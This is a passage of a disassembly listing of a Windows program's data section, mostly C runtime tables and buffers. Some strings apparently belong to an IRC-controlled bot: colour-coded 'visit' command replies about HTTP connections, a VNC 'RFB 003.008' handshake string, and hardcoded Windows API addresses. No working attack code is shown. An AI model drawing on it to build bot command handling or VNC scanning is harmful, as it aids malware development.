dword_43ACE4 dd 4E414Ch ; DATA XREF: sub_41B243:loc_41B2A5�o
aDialUp db 'Dial-up',0 ; DATA XREF: sub_41B243+5B�o
; char aNotConnected[]
aNotConnected db 'Not connected',0 ; DATA XREF: sub_41B243+48�o
align 10h
; char asc_43AD00[]
asc_43AD00 db '-' ; DATA XREF: sub_41B302:loc_41B4BB�o
db 3, 34h, 2
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2, 3, 2Dh
aFailedToConnec db ' Failed to connect to HTTP server.',0
align 10h
unk_43AD30 db 2Dh ; - ; DATA XREF: sub_41B302:loc_41B4B4�o
db 3, 34h, 2
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2, 3, 2Dh
aCouldNotOpenAC db ' Could not open a connection.',0
align 4
; char asc_43AD5C[]
asc_43AD5C db '-' ; DATA XREF: sub_41B302+1A0�o
db 3, 34h, 2
dd 69736976h, 2D030274h, 766E4920h, 64696C61h, 4C525520h
dd 2Eh
unk_43AD78 db 2Dh ; - ; DATA XREF: sub_41B302:loc_41B495�o
db 3, 34h, 2
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2, 3, 2Dh
aFailedToGetReq db ' Failed to get requested URL from HTTP server.',0
align 4
dword_43ADB4 dd 234032Dh, 69736976h, 2D030274h, 4C525520h, 73697620h
; DATA XREF: sub_41B302+18C�o
dd 64657469h, 2Eh
dword_43ADD0 dd 2A2F2Ah ; DATA XREF: sub_41B302+3B�o
word_43ADD4 dw 4 ; DATA XREF: sub_41B55B+10�r
align 4
dword_43ADD8 dd 6325h ; DATA XREF: .text:0041B89C�o
dword_43ADDC dd 0DFFh ; DATA XREF: .text:0041B6EA�o
dword_43ADE0 dd 51FFh ; DATA XREF: .text:0041B6DF�o
dword_43ADE4 dd 0EBFFh ; DATA XREF: .text:0041B6D4�o
dword_43ADE8 dd 201h ; DATA XREF: .text:0041B6BF�o
aRfb003_008 db 'RFB 003.008',0Ah,0 ; DATA XREF: .text:0041B6AD�o
align 10h
dword_43AE00 dd 56AA9175h ; DATA XREF: sub_41C2B8+4�w _rand�r ...
align 10h
dword_43AE10 dd 173Fh ; DATA XREF: _floor+D�r
dd 9875h, 9873h
off_43AE1C dd offset __fpmath ; DATA XREF: __cinit�r
dd offset nullsub_2
dd offset nullsub_2
dword_43AE28 dd 1B3Fh ; DATA XREF: _ceil+D�r
dword_43AE2C dd 19930520h, 4 dup(0) ; DATA XREF: __NLG_Notify1+2�o
; __NLG_Notify+2�o
off_43AE40 dd offset __exit ; DATA XREF: __amsg_exit+1C�r
dword_43AE44 dd 2 ; DATA XREF: __FF_MSGBANNER+E�r
; __NMSG_WRITE+46�r ...
dd 10h, 0
off_43AE50 dd offset off_43AE50 ; DATA XREF: sub_41F216+D�o
; sub_41F216+69�o ...
off_43AE54 dd offset off_43AE50 ; DATA XREF: sub_41F216:loc_41F296�r
; sub_41F216+89�w ...
dd offset dword_43AE68
dd offset dword_43AE68
dword_43AE60 dd 0FFFFFFFFh ; DATA XREF: sub_41F216�r
; sub_41F35A:loc_41F3A7�w
dd 0FFFFFFFFh
dword_43AE68 dd 0F0h, 0F1h, 800h dup(0) ; DATA XREF: .data:0043AE58�o
; .data:0043AE5C�o
off_43CE70 dd offset off_43AE50 ; DATA XREF: sub_41F35A+15�r
; sub_41F35A+20�w ...
dword_43CE74 dd 1E0h ; DATA XREF: sub_41BBE2+185�r
; sub_41BEF3:loc_41BF2F�r ...
off_43CE78 dd offset __wctype+2 ; DATA XREF: _atol+23�r
; _atol:loc_41C12F�r ...
off_43CE7C dd offset __wctype+2 ; DATA XREF: _iswctype+18�r
public __wctype
; const unsigned __int16 _wctype[]
__wctype dd 200000h ; DATA XREF: _x_ismbbtype+18�r
; .data:off_43CE78�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
; size_t SrcSizeInBytes
SrcSizeInBytes dd 1 ; DATA XREF: _atol:loc_41C0D6�r
; _atol:loc_41C11A�r ...
byte_43D088 db 2Eh ; DATA XREF: __input:loc_4210A4�r
; __input+311�r ...
align 4
dd 1
off_43D090 dd offset aNull ; DATA XREF: __output:loc_4202A3�r
; __output+457�r
; "(null)"
off_43D094 dd offset aNull_0 ; DATA XREF: __output+259�r
; "(null)"
byte_43D098 db 1 ; DATA XREF: __setmbcp+E1�r
db 2, 4, 8
align 10h
dword_43D0A0 dd 3A4h ; DATA XREF: __setmbcp+2F�o
dword_43D0A4 dd 82798260h ; DATA XREF: __setmbcp+11D�r
dd 21h, 0
dword_43D0B0 dd 0DFA6h ; DATA XREF: __setmbcp+C0�r
align 8
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_43D190 dd 1 ; DATA XREF: __setmbcp+3C�o
; __dosmaperr+C�o
dword_43D194 dd 16h ; DATA XREF: __dosmaperr:loc_420CB4�r
dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
asc_43D2F8 db ' ',9,'-',0Dh,']',0 ; DATA XREF: __dosmaperr+19�o
; __input:loc_421317�o
align 10h
asc_43D300: ; DATA XREF: __input:loc_421207�o
unicode 0, <]>,0
align 8
dword_43D308 dd 14h ; DATA XREF: __get_fname+2�o
off_43D30C dd offset aExp ; DATA XREF: __get_fname:loc_421EE1�r
; "exp"
dd 1Dh, 427858h, 1Ah, 42C60Ch, 1Bh, 427850h, 1Fh, 427848h
dd 13h, 427840h, 21h, 427838h, 0Eh, 427830h, 0Dh, 427828h
dd 0Fh, 427820h, 10h, 427818h, 5, 427810h, 1Eh, 42780Ch
dd 12h, 427808h, 20h, 427804h, 0Ch, 4277FCh, 0Bh, 4277F4h
dd 15h, 4277ECh, 1Ch, 4277E4h, 19h, 4277DCh, 11h, 4277D4h
dd 18h, 4277CCh, 16h, 4277C4h, 17h, 4277BCh, 22h, 4277B8h
dd 23h, 4277B4h, 24h, 4277B0h
dbl_43D3E0 dq 1.797693134862316e308 ; DATA XREF: __handle_exc+B7�r
; __handle_exc:loc_421CE6�r ...
dd 0
dd 0FFF80000h
dbl_43D3F0 dq 1.797693134862316e308 ; DATA XREF: __handle_exc+92�r
; __handle_exc:loc_421CBE�r ...
dd 0
dd 100000h, 0
dd 80000000h
tbyte_43D408 dt 2.3562723457267347066e313 ; DATA XREF: __set_statfp+D�r
; __set_statfp+1F�r
align 4
tbyte_43D414 dt 1.9149954921904370718e-1233 ; DATA XREF: __set_statfp+31�r
align 10h
off_43D420 dd offset __cfltcvt ; DATA XREF: __cfltcvt_init+F�w
; __output+3AA�r
off_43D424 dd offset __cropzeros ; DATA XREF: __cfltcvt_init+5�w
; __output+3E2�r
off_43D428 dd offset __fassign ; DATA XREF: __cfltcvt_init+14�w
; __input+430�r
off_43D42C dd offset __forcdecpt ; DATA XREF: __cfltcvt_init+1E�w
; __output+3CB�r
off_43D430 dd offset __positive ; DATA XREF: __cfltcvt_init+28�w
off_43D434 dd offset __cfltcvt ; DATA XREF: __cfltcvt_init+32�w
dd offset ?__CxxUnhandledExceptionFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z ; __CxxUnhandledExceptionFilter(_EXCEPTION_POINTERS *)
align 10h
dd offset sub_422DFC
off_43D444 dd offset sub_422DFC ; DATA XREF: sub_422E52+29�r
dword_43D448 dd 0C0000005h ; DATA XREF: _xcptlookup+A�r
; _xcptlookup+11�o ...
dword_43D44C dd 0Bh ; DATA XREF: _siglookup+A�r
dd 0
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
dd 0C000008Dh, 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
dd 0C0000090h, 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_43D4C0 dd 3 ; DATA XREF: __XcptFilter+58�r
; _raise+C8�r
dword_43D4C4 dd 7 ; DATA XREF: __XcptFilter+5E�r
; _raise+CD�r
dword_43D4C8 dd 0Ah ; DATA XREF: _xcptlookup+4�r
; _siglookup+4�r
dword_43D4CC dd 8Ch ; DATA XREF: __XcptFilter+82�r
; __XcptFilter+8F�w ...
dword_43D4D0 dd 0FFFFFFFFh, 0A00h ; DATA XREF: __filbuf:loc_41F964�o
; __flsbuf:loc_41FEE7�o
dword_43D4D8 dd 2 ; DATA XREF: __NMSG_WRITE+E�o
; __NMSG_WRITE+28�r
off_43D4DC dd offset aR6002FloatingP ; DATA XREF: __NMSG_WRITE+FC�r
; __NMSG_WRITE+12D�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 427B74h, 9, 427B48h, 0Ah, 427B24h, 10h, 427AF8h
dd 11h, 427AC8h, 12h, 427AA4h, 13h, 427A78h, 18h, 427A40h
dd 19h, 427A18h, 1Ah, 4279E0h, 1Bh, 4279A8h, 1Ch, 427980h
dd 78h, 427970h, 79h, 427960h, 7Ah, 427950h, 0FCh, 4349ECh
dd 0FFh, 427940h
off_43D568 dd offset dword_4DC020 ; DATA XREF: __NMSG_WRITE+1B�o
; ___initstdio+55�o
align 10h
dd offset dword_4DC020
dd 101h
dword_43D578 dd 0FFFFFFFFh, 0 ; DATA XREF: ___initstdio+72�o
dd 1000h, 0
dword_43D588 dd 3 dup(0) ; DATA XREF: __flsbuf+50�o __stbuf+12�o
dd 2, 0FFFFFFFFh, 3 dup(0)
dword_43D5A8 dd 3 dup(0) ; DATA XREF: __flsbuf+58�o
; __stbuf:loc_420D04�o
dd 2, 0FFFFFFFFh, 7 dup(0)
dword_43D5D8 dd 84h dup(0) ; DATA XREF: ___initstdio+9B�o
dword_43D7E8 dd 2 dup(0) ; DATA XREF: ___initstdio+69�o
dword_43D7F0 dd 2694h ; DATA XREF: __handle_qnan1+3�r
; __except1+46�r
align 8
dword_43D7F8 dd 400h, 0FFFFFC01h, 35h, 0Bh, 40h, 3FFh ; DATA XREF: sub_424CFC�o
dword_43D810 dd 80h, 0FFFFFF81h, 18h, 8, 20h, 7Fh ; DATA XREF: sub_424D12�o
dword_43D828 dd 2 dup(0) ; DATA XREF: ___multtenpow12+7�o
dd 4002A000h, 2 dup(0)
dd 4005C800h, 2 dup(0)
dd 4008FA00h, 2 dup(0)
dd 400C9C40h, 2 dup(0)
dd 400FC350h, 2 dup(0)
dd 4012F424h, 0
dd 80000000h, 40169896h, 0
dd 20000000h, 4019BEBCh, 0
dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh, 40D3C278h
dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h, 0A0AEA60Eh
dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h, 5D25D88Bh
dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
dd 52028A20h, 7525C460h, 0
dword_43D988 dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
; DATA XREF: ___multtenpow12+1B�o
dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h, 652CD3C3h
dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h, 3FEEA7C5h
dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h, 94D5E57Ah
dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh, 0E15B4C2Fh
dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h, 313BBABCh
dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h, 8D2FEED7h
dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh, 3B03A686h
dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h, 0EE32DB23h
dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h, 11B268E2h
dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh, 0BF3C9157h
dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h, 9FDE2DE4h
dd 4C8D2CEh, 0AD8A6DDh
off_43DAE4 dd offset off_427CEC ; DATA XREF: .rdata:00427EC4�o
; .rdata:00427FB0�o
dd 0
a_?avexception@ db '.?AVexception@@',0
off_43DAFC dd offset off_427CEC ; DATA XREF: .rdata:off_427D78�o
; .rdata:00427DB8�o ...
dd 0
a_?avlogic_erro db '.?AVlogic_error@std@@',0
align 4
off_43DB1C dd offset off_427CEC ; DATA XREF: .rdata:off_427DC0�o
; .rdata:00427E04�o ...
dd 0
a_?avout_of_ran db '.?AVout_of_range@std@@',0
align 4
off_43DB3C dd offset off_427CEC ; DATA XREF: .rdata:off_427E0C�o
; .rdata:00427E50�o ...
dd 0
a_?avlength_err db '.?AVlength_error@std@@',0
align 10h
off_43DB60 dd offset off_427CEC ; DATA XREF: .rdata:off_427E58�o
; .rdata:00427E94�o
align 8
a_?avtype_info@ db '.?AVtype_info@@',0
dd offset ?__CxxUnhandledExceptionFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z ; __CxxUnhandledExceptionFilter(_EXCEPTION_POINTERS *)
align 10h
dword_43DB80 dd 2 dup(0) ; DATA XREF: sub_40111D+C8�o
; char byte_43DB88
byte_43DB88 db 0 ; DATA XREF: sub_40111D+62�o
; WinMain(x,x,x,x)+24D�o ...
align 10h
; char dword_43DB90[]
dword_43DB90 dd 0 ; DATA XREF: WinMain(x,x,x,x)+38F�o
; sub_401ACD+AEC�o ...
dd 5 dup(0)
dword_43DBA8 dd 0 ; DATA XREF: sub_401ACD+B48�r
; sub_415C40+60�r
dd 2D9h dup(0)
dword_43E710 dd 0 ; DATA XREF: sub_401ACD+5D8C�r
; sub_401ACD+5E61�r ...
dd 7Fh dup(0)
dword_43E910 dd 0 ; DATA XREF: sub_40B3BA+41�w
; sub_40B4F5+40�w ...
dword_43E914 dd 0 ; DATA XREF: sub_40B3BA+47�w
; sub_40B4F5+46�w ...
dword_43E918 dd 0 ; DATA XREF: sub_40B3BA+52�w
; sub_40B4F5+3A�r ...
dword_43E91C dd 0 ; DATA XREF: sub_40111D+C�r
; sub_4017ED+B9�w ...
dword_43E920 dd 0 ; DATA XREF: sub_40B4F5+75�r
; sub_40B6D6+2A�w ...
dword_43E924 dd 0 ; DATA XREF: WinMain(x,x,x,x)+3DE�w
; WinMain(x,x,x,x)+456�w ...
byte_43E928 db 0 ; DATA XREF: sub_4017ED+91�o
; sub_401ACD+5CD7�r ...
align 4
dd 1B89h dup(0)
dword_445750 dd 473Ch dup(0) ; DATA XREF: .data:off_43492C�o
db 0
byte_457441 db 3 dup(0) ; DATA XREF: .data:off_43902C�o
dd 0E306h dup(0)
dword_49005C dd 937Eh dup(0) ; DATA XREF: .data:off_432948�o
db 0
byte_4B4E55 db 3 dup(0) ; DATA XREF: .data:off_43165C�o
dd 0FBh dup(0)
db 0
byte_4B5245 db 3 dup(0) ; DATA XREF: .data:off_438E98�o
dd 5932h dup(0)
dword_4CB710 dd 542h ; DATA XREF: sub_40111D+FD�w
; sub_40B3BA+13�o ...
dword_4CB714 dd 1Eh ; DATA XREF: WinMain(x,x,x,x)+3D�w
; sub_401ACD:loc_404494�r ...
dword_4CB718 dd 0 ; DATA XREF: WinMain(x,x,x,x):loc_4016FF�o
; char Dest[]
Dest db 80h dup(0) ; DATA XREF: WinMain(x,x,x,x)+495�o
; WinMain(x,x,x,x)+52F�o ...
; char byte_4CB79C[]
byte_4CB79C db 40h dup(0) ; DATA XREF: WinMain(x,x,x,x)+4AB�o
; char byte_4CB7DC[]
byte_4CB7DC db 90h dup(0) ; DATA XREF: WinMain(x,x,x,x)+4C2�o
dword_4CB86C dd 0 ; DATA XREF: WinMain(x,x,x,x)+4B6�w
; WinMain(x,x,x,x)+546�w ...
dword_4CB870 dd 0 ; DATA XREF: WinMain(x,x,x,x)+4D5�w
align 10h
byte_4CB880 db 0 ; DATA XREF: sub_401955+28�r
; sub_401955+30�o
align 4
dword_4CB884 dd 0 ; DATA XREF: WinMain(x,x,x,x)+4E3�w
; WinMain(x,x,x,x)+4FA�r ...
dword_4CB888 dd 0 ; DATA XREF: WinMain(x,x,x,x)+49A�w
; sub_401ACD+8A2�r
; char word_4CB88C[]
word_4CB88C dw 0 ; DATA XREF: sub_401ACD+7BAF�o
; .text:0040AFA9�o ...
align 10h
dword_4CB890 dd 77C72C6Bh ; DATA XREF: sub_409909+4A7�w
; sub_409909+4EB�r
dword_4CB894 dd 77EBA994h ; DATA XREF: sub_409909+65�w
; sub_419C09+166�r
dword_4CB898 dd 7622A3F4h ; DATA XREF: sub_409909+80B�w
; sub_409909+880�r ...
dword_4CB89C dd 71C45229h ; DATA XREF: sub_409909+9D8�w
; sub_409909+A43�r ...
dword_4CB8A0 dd 71C24870h ; DATA XREF: sub_409909+98A�w
; sub_409909+A13�r ...
dword_4CB8A4 dd 77C71BB0h ; DATA XREF: sub_409909+48D�w
; sub_409909+4DB�r
dword_4CB8A8 dd 77D4808Bh ; DATA XREF: sub_409909+213�w
; sub_409909+234�r ...
dword_4CB8AC dd 71C4502Ch ; DATA XREF: sub_409909+9CB�w
; sub_409909+A3B�r ...
dword_4CB8B0 dd 77DE801Bh ; DATA XREF: sub_409909+372�w
; sub_409909+3C7�r ...
dword_4CB8B4 dd 77DDACABh ; DATA XREF: sub_409909+40F�w
; sub_41AF8F+11E�r
dword_4CB8B8 dd 77DE8075h ; DATA XREF: sub_409909+37F�w
; sub_409909+3CF�r ...
dword_4CB8BC dd 77DD7496h ; DATA XREF: sub_409909+3C0�w
; sub_4191DB+AD�r
dword_4CB8C0 dd 71AB1B7Bh ; DATA XREF: sub_409909+55A�w
; sub_40FAD6+115�r ...
dword_4CB8C4 dd 77E686CCh ; DATA XREF: sub_409909+72�w
; sub_409909+D2�r ...
dword_4CB8C8 dd 71C2498Bh ; DATA XREF: sub_409909+97D�w
; sub_409909+A06�r ...
dword_4CB8CC dd 77DDAB2Fh ; DATA XREF: sub_409909+3A6�w
; sub_409909+3E7�r ...
dword_4CB8D0 dd 7620E8C3h ; DATA XREF: sub_409909+859�w
; sub_409909+8AC�r ...
dword_4CB8D4 dd 77DD23D7h ; DATA XREF: sub_409909+2A5�w
; sub_409909+2F0�r
dword_4CB8D8 dd 76214750h ; DATA XREF: sub_409909+84C�w
; sub_409909+8A4�r ...
dword_4CB8DC dd 77E6D75Bh ; DATA XREF: sub_409909+B3�w
dword_4CB8E0 dd 7620BD61h ; DATA XREF: sub_409909+866�w
; sub_409909+8B4�r ...
dword_4CB8E4 dd 71AB60C9h ; DATA XREF: sub_409909+54D�w
; sub_409909+6D0�r ...
dword_4CB8E8 dd 77EBA6E9h ; DATA XREF: sub_409909+58�w
; sub_409909+CA�r ...
dword_4CB8EC dd 76D62A58h ; DATA XREF: sub_409909+934�w
; sub_413E10+11A�r
dword_4CB8F0 dd 76F36EAAh ; DATA XREF: sub_401ACD:loc_403ECB�r
; sub_409909+A95�w ...
dword_4CB8F4 dd 77E802FCh ; DATA XREF: sub_409909+A6�w
; sub_409909+F2�r
dword_4CB8F8 dd 77C75455h ; DATA XREF: sub_409909+480�w
; sub_409909+4D3�r
dword_4CB8FC dd 71AB12A7h ; DATA XREF: sub_409909+5F6�w
; sub_40C267+20�r ...
dword_4CB900 dd 71C574FAh ; DATA XREF: sub_409909+9BE�w
; sub_409909+A33�r
dword_4CB904 dd 71AB1746h ; DATA XREF: sub_409909+5E9�w
; sub_409909+754�r ...
dword_4CB908 dd 71C21CA3h ; DATA XREF: sub_409909+A0C�w
dword_4CB90C dd 71B28D0Dh ; DATA XREF: sub_409909+B50�w
; sub_40DC41+9A�r
dword_4CB910 dd 762211EFh ; DATA XREF: sub_409909+7FE�w
; sub_409909+86D�r ...
dword_4CB914 dd 77D902E3h ; DATA XREF: sub_409909+1B3�w
; sub_40B5B5+3D�o ...
dword_4CB918 dd 71C2FA86h ; DATA XREF: sub_409909+997�w
; sub_409909+A1B�r ...
dword_4CB91C dd 77DE1291h ; DATA XREF: sub_409909+38C�w
; sub_409909+3D7�r ...
dword_4CB920 dd 77E2C1B3h ; DATA XREF: sub_409909+399�w
; sub_409909+3DF�r ...
dword_4CB924 dd 73B81E3Bh ; DATA XREF: sub_409909+C85�w
; sub_409909+C8C�r
dword_4CB928 dd 71ABF628h ; DATA XREF: sub_409909+6AC�w
; sub_4111C0+D0�r
dword_4CB92C dd 71AB1836h ; DATA XREF: sub_40111D+1D�r
; sub_40111D+23�r ...
dword_4CB930 dd 77C72889h ; DATA XREF: sub_409909+4B4�w
dword_4CB934 dd 71C453F8h ; DATA XREF: sub_409909+9E5�w
; sub_409909+A4B�r ...
dword_4CB938 dd 77DD5C55h ; DATA XREF: sub_401000+51�r
; sub_409909+2B2�w ...
dword_4CB93C dd 77E96645h ; DATA XREF: sub_409909+7F�w
; sub_409909+DA�r ...
dword_4CB940 dd 77428B97h ; DATA XREF: sub_401ACD+5840�r
; sub_401ACD+781E�r ...
dword_4CB944 dd 71AB41DAh ; DATA XREF: WinMain(x,x,x,x)+8C�r
; sub_401ACD+5037�r ...
dword_4CB948 dd 762059A3h ; DATA XREF: sub_409909+825�w
; sub_409909+890�r ...
dword_4CB94C dd 71C4A1B4h ; DATA XREF: sub_409909+9A4�w
; sub_409909+A23�r
dword_4CB950 dd 1F7CD214h ; DATA XREF: sub_409909+C0E�w
; sub_409909+C3F�r
dword_4CB954 dd 77E09134h ; DATA XREF: sub_409909+2CC�w
; sub_418A2E+47�r
dword_4CB958 dd 77D4456Bh ; DATA XREF: sub_409909+22D�w
; sub_4126A7+40�r ...
dword_4CB95C dd 76D629BBh ; DATA XREF: sub_409909+91A�w
; sub_409909+92E�r ...
dword_4CB960 dd 1F7B9D96h ; DATA XREF: sub_409909+C28�w
dword_4CB964 dd 77E09070h ; DATA XREF: sub_409909+2D9�w
; sub_418A2E+4F�r
dword_4CB968 dd 71AB1740h ; DATA XREF: sub_409909+574�w
; sub_409909+6E8�r ...
dword_4CB96C dd 7620AFB6h ; DATA XREF: sub_409909+83F�w
; sub_409909+873�r
dword_4CB970 dd 77D5C13Ah ; DATA XREF: sub_409909+220�w
; sub_409909+23C�r ...
dword_4CB974 dd 77D45B19h ; DATA XREF: sub_409909+172�w
; sub_409909+1C2�r
dword_4CB978 dd 71AB157Eh ; DATA XREF: sub_401ACD+1DCE�r
; sub_401ACD+59F9�r ...
dword_4CB97C dd 71AB3E5Dh ; DATA XREF: sub_4017ED+C4�r
; sub_401ACD+50C1�r ...
dword_4CB980 dd 71AB14DCh ; DATA XREF: sub_409909+567�w
; sub_409909+6DC�r ...
dword_4CB984 dd 0CC0004h ; DATA XREF: sub_409909+8DB�w
; sub_409909:loc_40A202�w ...
dword_4CB988 dd 77DD590Bh ; DATA XREF: sub_401000+26�r
; sub_409909+28B�w ...
dword_4CB98C dd 71ABD755h ; DATA XREF: sub_401ACD+77AF�r
; sub_409909+69F�w ...
dword_4CB990 dd 77DF7311h ; DATA XREF: sub_409909+32D�w
; sub_409909+341�r ...
dword_4CB994 dd 77DDA2AFh ; DATA XREF: sub_409909+3B3�w
; sub_409909+3EF�r ...
dword_4CB998 dd 1F7CD927h ; DATA XREF: sub_409909+C01�w
; sub_409909+C37�r
dword_4CB99C dd 76206853h ; DATA XREF: sub_409909+818�w
; sub_409909+888�r ...
dword_4CB9A0 dd 77D4932Ch ; DATA XREF: sub_409909+206�w
; sub_409909+227�r ...
dword_4CB9A4 dd 77D5E310h ; DATA XREF: sub_409909+18C�w
; sub_409909+1D2�r ...
dword_4CB9A8 dd 76206B7Fh ; DATA XREF: sub_409909+832�w
; sub_409909+898�r ...
dword_4CB9AC dd 71AB1444h ; DATA XREF: sub_409909+624�w
; sub_409909+774�r ...
dword_4CB9B0 dd 77DD189Ah ; DATA XREF: sub_401000+5A�r
; sub_409909+2BF�w ...
dword_4CB9B4 dd 71AB3F8Dh ; DATA XREF: sub_409909+66B�w
; sub_409909+79C�r ...
dword_4CB9B8 dd 77DD5D20h ; DATA XREF: sub_409909+320�w
; sub_409909+334�r ...
dword_4CB9BC dd 71AB1890h ; DATA XREF: sub_409909+644�w
; sub_409909+784�r ...
dword_4CB9C0 dd 77C76B34h ; DATA XREF: sub_409909+44C�w
; sub_409909+4AE�r
dword_4CB9C4 dd 77D5E38Ch ; DATA XREF: sub_409909+199�w
; sub_409909+1DA�r ...
dword_4CB9C8 dd 77DDA20Bh ; DATA XREF: sub_409909+365�w
; sub_409909+3BA�r ...
dword_4CB9CC dd 76F36EEBh ; DATA XREF: sub_409909+AA2�w
dword_4CB9D0 dd 71AB12A7h ; DATA XREF: sub_409909+5DC�w
; sub_409909+748�r ...
dword_4CB9D4 dd 71AB1746h ; DATA XREF: sub_4017ED+3E�r
; sub_401ACD+5073�r ...
dword_4CB9D8 dd 77EBA595h ; DATA XREF: sub_409909+4B�w
; sub_409909+C2�r ...
dword_4CB9DC dd 77C7531Dh ; DATA XREF: sub_409909+473�w
; sub_409909+4CB�r
dword_4CB9E0 dd 77D4BDCAh ; DATA XREF: sub_409909+165�w
; sub_409909+1BA�r ...
dword_4CB9E4 dd 71C3516Ah ; DATA XREF: sub_409909+9FF�w
; sub_409909+A5B�r ...
dword_4CB9E8 dd 71AB32CAh ; DATA XREF: sub_409909+685�w
; sub_409909+7AC�r ...
dword_4CB9EC dd 71AB5690h ; DATA XREF: sub_401955+D1�r
; sub_401ACD+50D6�r ...
dword_4CB9F0 dd 1F7CB8F8h ; DATA XREF: sub_409909+C1B�w
; sub_409909+C47�r
dword_4CB9F4 dd 77EBB1E7h ; DATA XREF: sub_409909+3E�w
; sub_409909+BA�r ...
dword_4CB9F8 dd 77DD59F0h ; DATA XREF: sub_401000+45�r
; sub_409909+298�w ...
dword_4CB9FC dd 71AB5DE2h ; DATA XREF: sub_409909+651�w
; sub_409909+78C�r ...
dword_4CBA00 dd 71AB3ECEh ; DATA XREF: sub_409909+637�w
; sub_409909+77C�r ...
dword_4CBA04 dd 73B81B0Fh ; DATA XREF: sub_409909+C92�w
dword_4CBA08 dd 76204E4Dh ; DATA XREF: sub_409909+879�w
; sub_4167A0+4DC�r ...
dword_4CBA0C dd 0 ; DATA XREF: sub_409909+112�w
dword_4CBA10 dd 1F7D886Ah ; DATA XREF: sub_409909+BE7�w
; sub_409909+C22�r
dword_4CBA14 dd 71AB12F8h ; DATA XREF: sub_401ACD+2F9B�r
; sub_401ACD+5EB8�r ...
dword_4CBA18 dd 77C76551h ; DATA XREF: sub_409909+459�w
; sub_409909+4BB�r
dword_4CBA1C dd 77C729E2h ; DATA XREF: sub_409909+49A�w
; sub_409909+4E3�r
dword_4CBA20 dd 77C7212Fh ; DATA XREF: sub_409909+466�w
; sub_409909+4C3�r
dword_4CBA24 dd 71AB1AF4h ; DATA XREF: sub_401955+89�r
; sub_401ACD+50F3�r ...
dword_4CBA28 dd 77D5E303h ; DATA XREF: sub_409909+1A6�w
; sub_409909+1E2�r ...
dword_4CBA2C dd 71C4576Ch ; DATA XREF: sub_409909+9F2�w
; sub_409909+A53�r ...
